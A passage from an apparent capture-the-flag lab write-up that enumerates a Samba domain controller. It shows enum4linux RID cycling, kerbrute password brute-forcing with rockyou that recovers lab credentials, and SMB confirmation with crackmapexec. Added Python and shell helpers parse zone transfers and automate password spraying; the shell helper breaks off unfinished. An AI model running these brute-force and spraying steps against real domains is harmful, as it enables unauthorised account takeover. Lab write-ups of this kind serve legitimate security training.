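A zone transfer like this is the fastest map of the lab, so it is worth turning into a target list mechanically. The block below is an added example in Python, not code from the original post: it parses dig's AXFR output, groups A records by /24 to surface the 172.16.40.0/24 and 172.16.50.0/24 segments that have not been scanned yet, and flags names such as token-SDS34gs93 whose 127.0.0.1 address is useless but whose name is the prize. The sample zone is a constructed subset of the records above.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample: a subset of the test.lab zone as dig axfr printed it (values from the page)
SAMPLE_AXFR = """\
; <<>> DiG 9.11.14-3-Debian <<>> axfr @172.16.0.10 test.lab.
;; global options: +cmd
test.lab.               21600   IN      SOA     test.lab. ns1.test.lab. 117 5 30 21600 60
test.lab.               21600   IN      NS      ns1.test.lab.
_ldap._tcp.dc._msdcs.test.lab. 21600 IN SRV     0 0 389 test.lab.
admin.test.lab.         21600   IN      A       172.16.40.3
dc.test.lab.            21600   IN      A       172.16.50.20
dc2.test.lab.           21600   IN      A       172.16.0.20
dns.test.lab.           21600   IN      A       172.16.0.10
dns.test.lab.           21600   IN      A       172.16.50.10
elastic.test.lab.       21600   IN      A       172.16.40.6
git.test.lab.           21600   IN      A       172.16.0.21
mail.test.lab.          21600   IN      A       172.16.50.3
token-SDS34gs93.test.lab. 21600 IN      A       127.0.0.1
vpn-2.test.lab.         21600   IN      A       172.16.0.11
"""

# owner  TTL  IN  TYPE  rdata  (the column layout dig uses for AXFR answers)
RR = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(\S+)\s+(.*)$")


def parse_axfr(text):
    """Yield (owner, ttl, rtype, rdata) for every resource record; skip dig's ';' comment lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RR.match(line)
        if m:
            yield m.group(1).rstrip("."), int(m.group(2)), m.group(3), m.group(4).strip()


def a_records(text):
    """(name, ip) pairs for the A records only."""
    return [(name, rdata) for name, _, rtype, rdata in parse_axfr(text) if rtype == "A"]


def subnets(text, prefix=24):
    """Group A records by /prefix so each discovered segment becomes a scan target.
    Loopback and link-local addresses are dropped: they are not reachable networks."""
    nets = defaultdict(list)
    for name, ip in a_records(text):
        addr = ipaddress.ip_address(ip)
        if addr.is_loopback or addr.is_link_local:
            continue
        net = ipaddress.ip_network(f"{ip}/{prefix}", strict=False)
        nets[str(net)].append((name, ip))
    return dict(nets)


def suspicious_names(text, pattern=r"token|flag|secret|backup|old"):
    """Owner names whose leftmost label looks interesting regardless of where they point."""
    rx = re.compile(pattern, re.I)
    return sorted({name for name, *_ in parse_axfr(text) if rx.search(name.split(".")[0])})


if __name__ == "__main__":
    for net, hosts in sorted(subnets(SAMPLE_AXFR).items()):
        print(net, [h for h, _ in hosts])
    print("look at:", suspicious_names(SAMPLE_AXFR))
```

Feed it the real dig output (dig axfr @172.16.0.10 test.lab. > zone.txt) and the per-/24 host lists go straight into nmap; the SRV records are parsed too, so the same loop can pull the KDC and LDAP ports out of _kerberos._tcp and _ldap._tcp if needed.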


  1. DC2


root@kali  ~/ctf/pentestitlab14  enum4linux 172.16.0.20 -u 'DC2\dev'  -p 'L1(#@ru0euh0if'

(enum4linux stops parsing options at the first non-option argument, so with the target given before -u/-p the credentials were silently ignored and this is a null-session run, as the banner shows: Username '' and "allows sessions using username '', password ''". The Samba DC permits the null session anyway; put the target last for an authenticated run.)
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb 13 16:26:10 2020


 ========================== 
|    Target Information    |
 ========================== 
Target ........... 172.16.0.20
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 =================================================== 
|    Enumerating Workgroup/Domain on 172.16.0.20    |
 =================================================== 
[+] Got domain/workgroup name: TEST


 =========================================== 
|    Nbtstat Information for 172.16.0.20    |
 =========================================== 
Looking up status of 172.16.0.20
DC2             <00> - M <ACTIVE>  Workstation Service
DC2             <03> - M <ACTIVE>  Messenger Service
DC2             <20> - M <ACTIVE>  File Server Service
TEST            <1c> - <GROUP> M <ACTIVE>  Domain Controllers
TEST            <00> - <GROUP> M <ACTIVE>  Domain/Workgroup Name
__SAMBA__       <00> - <GROUP> M <ACTIVE> <PERMANENT>  Domain/Workgroup Name


MAC Address = 00-00-00-00-00-00


 ==================================== 
|    Session Check on 172.16.0.20    |
 ==================================== 
[+] Server 172.16.0.20 allows sessions using username '', password ''


 ========================================== 
|    Getting domain SID for 172.16.0.20    |
 ========================================== 
Domain Name: TEST
Domain Sid: S-1-5-21-518050695-217262318-2335301019
[+] Host is part of a domain (not a workgroup)


 ===================================== 
|    OS information on 172.16.0.20    |
 ===================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 172.16.0.20 from smbclient: 
[+] Got OS info for 172.16.0.20 from srvinfo:
DC2            Wk Sv PrQ Unx NT SNT Samba 4.5.16-Debian
platform_id     :500
os version      :6.1
server type     :0x809a03


 ============================ 
|    Users on 172.16.0.20    |
 ============================ 
index: 0x1 RID: 0x44f acb: 0x00000010 Account: sidorov           Name: Maksim Sidorov  Desc: 
index: 0x2 RID: 0x1f4 acb: 0x00000010 Account: Administrator     Name:                 Desc: Built-in account for administering the computer/domain
index: 0x3 RID: 0x450 acb: 0x00000010 Account: ivanov            Name: Ego Ivanov      Desc: 
index: 0x4 RID: 0x458 acb: 0x00000010 Account: leonov            Name:  Leonov         Desc: 
index: 0x5 RID: 0x457 acb: 0x00000010 Account: petrov            Name:  Petrov         Desc: 
index: 0x6 RID: 0x1f6 acb: 0x00000011 Account: krbtgt            Name:                 Desc: Key Distribution Center Service Account
index: 0x7 RID: 0x1f5 acb: 0x00000215 Account: Guest             Name:                 Desc: Built-in account for guest access to the computer/domain
index: 0x8 RID: 0x452 acb: 0x00000010 Account: token_OWdjwifiw0  Name:  Token          Desc: 


user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[sidorov] rid:[0x44f]
user:[ivanov] rid:[0x450]
user:[token_OWdjwifiw0] rid:[0x452]
user:[petrov] rid:[0x457]
user:[leonov] rid:[0x458]


 ======================================== 
|    Share Enumeration on 172.16.0.20    |
 ======================================== 


Sharename       Type Comment
---------       ---- -------
netlogon        Disk      
sysvol          Disk      
IPC$            IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available


[+] Attempting to map shares on 172.16.0.20
//172.16.0.20/netlogon  Mapping: DENIED, Listing: N/A
//172.16.0.20/sysvol    Mapping: DENIED, Listing: N/A
//172.16.0.20/IPC$      [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*


 =================================================== 
|    Password Policy Information for 172.16.0.20    |
 =================================================== 


[+] Attaching to 172.16.0.20 using a NULL share


[+] Trying protocol 139/SMB...


[+] Found domain(s):


[+] TEST
[+] BUILTIN


[+] Password Info for Domain: TEST


[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 268 days 23 hours 59 minutes 
[+] Password Complexity Flags: 000000


[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0


[+] Minimum password age: 268 days 2 minutes 
[+] Reset Account Lockout Counter: 30 minutes 
[+] Locked Account Duration: 30 minutes 
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set


[+] Retieved partial password policy with rpcclient:


Password Complexity: Disabled
Minimum Password Length: 7


 ============================= 
|    Groups on 172.16.0.20    |
 ============================= 


[+] Getting builtin groups:
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Account Operators] rid:[0x224]
group:[Server Operators] rid:[0x225]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]


[+] Getting builtin group memberships:


[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]


[+] Getting local group memberships:
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Cert Publishers
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Read-Only Domain Controllers
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\krbtgt
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Domain Controllers
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Schema Admins
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Domain Admins
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Group Policy Creator Owners
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Enterprise Admins


[+] Getting domain groups:
group:[Enterprise Read-Only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-Only Domain Controllers] rid:[0x209]
group:[DnsUpdateProxy] rid:[0x44e]


[+] Getting domain group memberships:
Group 'Group Policy Creator Owners' (RID: 520) has member: TEST\Administrator
Group 'Schema Admins' (RID: 518) has member: TEST\Administrator
Group 'Domain Admins' (RID: 512) has member: TEST\Administrator
Group 'Enterprise Admins' (RID: 519) has member: TEST\Administrator


 ====================================================================== 
|    Users on 172.16.0.20 via RID cycling (RIDS: 500-550,1000-1050)    |
 ====================================================================== 
[I] Found new SID: S-1-5-21-518050695-217262318-2335301019
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-518050695-217262318-2335301019 and logon username '', password ''
S-1-5-21-518050695-217262318-2335301019-500 TEST\Administrator (Local User)
S-1-5-21-518050695-217262318-2335301019-501 TEST\Guest (Local User)
S-1-5-21-518050695-217262318-2335301019-502 TEST\krbtgt (Local User)
S-1-5-21-518050695-217262318-2335301019-503 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-504 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-505 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-506 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-507 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-508 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-509 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-510 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-511 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-512 TEST\Domain Admins (Domain Group)
S-1-5-21-518050695-217262318-2335301019-513 TEST\Domain Users (Domain Group)
S-1-5-21-518050695-217262318-2335301019-514 TEST\Domain Guests (Domain Group)
S-1-5-21-518050695-217262318-2335301019-515 TEST\Domain Computers (Domain Group)
S-1-5-21-518050695-217262318-2335301019-516 TEST\Domain Controllers (Domain Group)
S-1-5-21-518050695-217262318-2335301019-517 TEST\Cert Publishers (Local Group)
S-1-5-21-518050695-217262318-2335301019-518 TEST\Schema Admins (Domain Group)
S-1-5-21-518050695-217262318-2335301019-519 TEST\Enterprise Admins (Domain Group)
S-1-5-21-518050695-217262318-2335301019-520 TEST\Group Policy Creator Owners (Domain Group)
S-1-5-21-518050695-217262318-2335301019-521 TEST\Read-Only Domain Controllers (Domain Group)
S-1-5-21-518050695-217262318-2335301019-522 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-523 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-524 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-525 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-526 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-527 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-528 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-529 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-530 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-531 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-532 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-533 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-534 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-535 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-536 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-537 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-538 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-539 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-540 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-541 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-542 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-543 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-544 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-545 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-546 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-547 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-548 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-549 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-550 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1000 TEST\AD1$ (Local User)
S-1-5-21-518050695-217262318-2335301019-1001 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1002 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1003 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1004 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1005 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1006 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1007 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1008 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1009 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1010 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1011 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1012 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1013 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1014 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1015 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1016 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1017 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1018 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1019 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1020 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1021 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1022 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1023 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1024 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1025 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1026 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1027 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1028 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1029 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1030 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1031 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1032 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1033 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1034 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1035 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1036 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1037 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1038 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1039 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1040 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1041 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1042 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1043 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1044 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1045 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1046 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1047 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1048 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1049 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 *unknown*\*unknown* (8)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)


 ============================================ 
|    Getting printer info for 172.16.0.20    |
 ============================================ 
No printers returned.


enum4linux complete on Thu Feb 13 16:35:40 2020


 root@kali  ~/ctf/pentestitlab14            


 root@kali  /opt/kerbrute/dist   master v1.0.3 ./kerbrute_linux_amd64 bruteuser --dc 172.16.0.20 -d test.lab /usr/share/wordlists/rockyou.txt sidorov -t 200                      1 ↵ ⚡ 3612 18:40:36


    __             __   __     
   / /_____  _____/ /_ _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ / / /_/ / /  / /_/ / /_/ __/
/_/|_|\___/_/  /_.___/_/ \__,_/\__/\___/                                        


Version: dev (9dad6e1) - 02/13/20 - Ronnie Flathers @ropnop


2020/02/13 18:40:52 >  Using KDC(s):
2020/02/13 18:40:52 >  172.16.0.20:88


2020/02/13 18:41:23 >  [+] VALID LOGIN:sidorov@test.lab:1234qwer
2020/02/13 18:41:26 >  Done! Tested 3277 logins (1 successes) in 34.014 seconds
 root@kali  /opt/kerbrute/dist   master v1.0.3                
 root@kali  ~/ctf/pentestitlab14/vpn2  smbclient -L 172.16.0.20 -U 'sidorov@test.lab' -p 1234qwer                                                                               
Enter sidorov@test.lab's password: 


Sharename       Type Comment
---------       ---- -------
netlogon        Disk      
sysvol          Disk      
IPC$            IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available
 root@kali  ~/ctf/pentestitlab14/vpn2            


 root@kali  ~/ctf/pentestitlab14  crackmapexec smb 172.16.0.20 -u 'sidorov@test.lab'  -p 1234qwer -x whoami                                                                   
SMB         172.16.0.20     445 DC2         [*] Windows 6.1 (name:DC2) (domain:TEST) (signing:True) (SMBv1:True)
SMB         172.16.0.20     445 DC2         [+] TEST\sidorov@test.lab:1234qwer 
 root@kali  ~/ctf/pentestitlab14             


 root@kali  /opt/kerbrute/dist   master v1.0.3 ./kerbrute_linux_amd64 bruteuser --dc 172.16.0.20 -d test.lab /usr/share/wordlists/rockyou.txt petrov -t 200                         ✔ ⚡ 3676 19:10:47


    __             __   __     
   / /_____  _____/ /_ _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ / / /_/ / /  / /_/ / /_/ __/
/_/|_|\___/_/  /_.___/_/ \__,_/\__/\___/                                        


Version: dev (9dad6e1) - 02/13/20 - Ronnie Flathers @ropnop


2020/02/13 19:10:56 >  Using KDC(s):
2020/02/13 19:10:56 >  172.16.0.20:88


2020/02/13 19:12:16 >  [+] VALID LOGIN:petrov@test.lab:P@ssw0rd
2020/02/13 19:12:20 >  Done! Tested 8182 logins (1 successes) in 83.873 seconds
 root@kali  /opt/kerbrute/dist   master v1.0.3      


 root@kali  ~/ctf/pentestitlab14  smbclient -L 172.16.0.20 -U 'petrov@test.lab'                                                                                                        ✔ ⚡ 3747 19:18:44
Enter petrov@test.lab's password: 


Sharename       Type Comment
---------       ---- -------
netlogon        Disk      
sysvol          Disk      
IPC$            IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available
 root@kali  ~/ctf/pentestitlab14  cme smb 172.16.0.20 -u 'petrov@test.lab'  -p 'P@ssw0rd' -x whoami                                                                 ✔ ⚡ 3748 19:20:36
CME          172.16.0.20:445 DC2             [*] Windows 6.1 Build 0 (name:DC2) (domain:TEST)
CME          172.16.0.20:445 DC2             [+] TEST\petrov@test.lab:P@ssw0rd 
[*] KTHXBYE!
 root@kali  ~/ctf/pentestitlab14     
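The three steps above (RID cycling with enum4linux to learn account names, kerbrute against the KDC on 172.16.0.20:88, then confirming the hit over SMB with smbclient and crackmapexec) can be tied together with a small shell helper. The script below is an added example, not part of the original write-up; its sample enum4linux output is constructed (the TEST\... entries and the 1111111111-2222222222-3333333333 domain identifier are invented; only the BUILTIN lines mirror what enum4linux printed on the page), and it assumes a `kerbrute` binary on PATH rather than the `./kerbrute_linux_amd64` used above. `enum_users` keeps only entries typed `(Local User)` and drops groups, unresolved SIDs, machine accounts and krbtgt; `spray_one` wraps `kerbrute passwordspray` with `--safe`, one password across the whole list per round, which is the lockout-aware way to do what the page does with `bruteuser` and rockyou in a lab that has no lockout policy. Two points from the transcript worth keeping in mind: kerbrute only tests Kerberos pre-authentication, so a hit still needs confirming over SMB as the page does; and smbclient's `-p` is the port option, not the password, which is why the first smbclient run above still prompted for one. Credentials go in `-U 'user%password'`.

```shell
#!/bin/sh
# Added example (not from the original write-up): build a kerbrute user list
# from enum4linux RID-cycling output, spray one password across it with
# kerbrute, and confirm a hit over SMB.
set -eu

# Constructed sample of enum4linux -r output. The TEST\... lines and the
# 1111111111-2222222222-3333333333 domain identifier are invented for this
# example; only the BUILTIN lines match what enum4linux printed on the page.
SAMPLE_ENUM4LINUX='S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-21-1111111111-2222222222-3333333333-500 TEST\Administrator (Local User)
S-1-5-21-1111111111-2222222222-3333333333-502 TEST\krbtgt (Local User)
S-1-5-21-1111111111-2222222222-3333333333-513 TEST\Domain Users (Domain Group)
S-1-5-21-1111111111-2222222222-3333333333-1000 TEST\DC2$ (Local User)
S-1-5-21-1111111111-2222222222-3333333333-1104 TEST\sidorov (Local User)
S-1-5-21-1111111111-2222222222-3333333333-1105 TEST\petrov (Local User)
S-1-5-21-1111111111-2222222222-3333333333-1106 *unknown*\*unknown* (8)'

# enum_users: read enum4linux output on stdin (or from the files given as
# arguments) and print one candidate username per line. Only entries typed
# "(Local User)" are kept; groups, unresolved SIDs "(8)", machine accounts
# (trailing $) and krbtgt are dropped because none of them can be sprayed.
enum_users() {
  awk '
    / \(Local User\)$/ {
      line = $0
      sub(/^S-1-5-[0-9-]+ /, "", line)   # drop the SID
      sub(/ \(Local User\)$/, "", line)  # drop the type marker
      sub(/^[^\\]*\\/, "", line)         # drop the DOMAIN\ prefix
      if (line ~ /\$$/ || line == "krbtgt") next
      print line
    }' "$@"
}

# spray_one DC DOMAIN USERFILE PASSWORD
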